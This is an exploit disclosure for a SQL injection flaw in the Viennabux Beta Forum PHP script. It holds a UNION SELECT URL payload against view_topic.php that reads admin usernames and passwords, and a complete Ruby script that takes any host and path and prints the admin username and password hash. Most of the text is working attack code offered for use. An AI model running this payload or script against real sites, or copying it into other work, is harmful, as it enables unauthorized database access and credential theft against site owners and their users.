Viennabux Beta Forum <= SQL injection Vulnerability &
Posted on 09 April 2010
======================================================================= Viennabux Beta Forum <= SQL injection Vulnerability & Injection Exploit ======================================================================= ----------------------------Information------------------------------------------------ +Name : Viennabux Beta Forum <= SQL injection Vulnerability & SQL injection Exploit +Autor : Easy Laster +Date : 09.04.2010 +Script : Viennabux Beta Forum +Download : ----------- +Demo : www.viennabux.com +Price : -------- +Language : PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/forum/view_topic.php?cat= +SQL Injection +Exploitable : http://www.site.com/forum/view_topic.php?cat=1+union+select+1,concat (aUsername,0x3a,apassword),3,4,5,6,7+from+admins ---------------------------------------------------------------------------------------- #!/usr/bin/ruby #4004-security-project.com #Welcome to my first ruby SQL injection exploit #Discovered and vulnerability by Easy Laster print " ######################################################### # 4004-Security-Project # ######################################################### # Viennabux Beta Forum Sql injection # # Exploit # # Using Host+Path+prefix # # www.demo.de /forum/ # # Easy Laster # ######################################################### " require 'net/http' print "#########################################################" print " Enter host name (site.com)->" host=gets.chomp print "#########################################################" print " Enter script path (/forum/)->" path=gets.chomp print " #########################################################" begin dir = 'view_topic.php?cat=1+union+select+1,concat(0x23,0x23,0x23,0x23,0x23,aUsername,0x23,0x23,0x23,0x23,0x23),3,4,5,6,7+from+admins' http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print " Username -> "+(/#####(.+)#####/).match(resp.body)[1] dir = 'view_topic.php?cat=1+union+select+1,concat(0x23,0x23,0x23,0x23,0x23,apassword,0x23,0x23,0x23,0x23,0x23),3,4,5,6,7+from+admins' http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print " Password Hash -> "+(/#####(.+)#####/).match(resp.body)[1] print " #########################################################" rescue print " Exploit failed" end # Inj3ct0r.com [2010-04-09]
